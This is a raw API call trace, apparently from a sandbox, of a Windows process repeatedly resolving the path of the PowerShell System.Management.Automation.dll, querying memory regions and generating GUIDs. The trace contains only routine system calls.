	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] VirtualQuery (in: lpAddress=0x28b180, lpBuffer=0x28c040, dwLength=0x30 | out: lpBuffer=0x28c040*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.075] VirtualQuery (in: lpAddress=0x28b210, lpBuffer=0x28c0d0, dwLength=0x30 | out: lpBuffer=0x28c0d0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] VirtualQuery (in: lpAddress=0x28b430, lpBuffer=0x28c2f0, dwLength=0x30 | out: lpBuffer=0x28c2f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd74e8fc7, Data2=0xf3a3, Data3=0x4a17, Data4=([0]=0xba, [1]=0xd4, [2]=0x0, [3]=0x58, [4]=0xd6, [5]=0xb5, [6]=0x40, [7]=0xf9))) returned 0x0
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.077] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x9b39386b, Data2=0x7afa, Data3=0x4158, Data4=([0]=0xae, [1]=0xef, [2]=0xfa, [3]=0xa2, [4]=0x74, [5]=0x49, [6]=0x37, [7]=0x2c))) returned 0x0
	[0318.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xd75ca06, Data2=0xc1d3, Data3=0x468a, Data4=([0]=0xbc, [1]=0x11, [2]=0xfe, [3]=0x9a, [4]=0x1a, [5]=0xcf, [6]=0xd7, [7]=0xc3))) returned 0x0
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x584733ea, Data2=0x4cd4, Data3=0x4188, Data4=([0]=0xac, [1]=0xec, [2]=0x20, [3]=0xb6, [4]=0x14, [5]=0x5b, [6]=0xbc, [7]=0xaf))) returned 0x0
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.080] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x142b80c7, Data2=0xe994, Data3=0x4ffe, Data4=([0]=0xa3, [1]=0x6c, [2]=0xcc, [3]=0x0, [4]=0x55, [5]=0xa6, [6]=0x54, [7]=0x55))) returned 0x0
	[0318.080] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0x6cb155bc, Data2=0x4340, Data3=0x4bdf, Data4=([0]=0x98, [1]=0x55, [2]=0x9a, [3]=0x1b, [4]=0xa0, [5]=0x26, [6]=0x4d, [7]=0x13))) returned 0x0
	[0318.080] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xcdcf10d8, Data2=0x3ac3, Data3=0x4bb9, Data4=([0]=0xac, [1]=0x8d, [2]=0x20, [3]=0x2d, [4]=0x50, [5]=0x10, [6]=0x41, [7]=0xd1))) returned 0x0
	[0318.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.081] CoCreateGuid (in: pguid=0x28d170 | out: pguid=0x28d170*(Data1=0xde81e77a, Data2=0x3bd6, Data3=0x45a2, Data4=([0]=0x88, [1]=0x0, [2]=0x21, [3]=0x22, [4]=0x75, [5]=0x69, [6]=0xec, [7]=0x44))) returned 0x0
	[0318.081] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.081] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.081] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.082] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
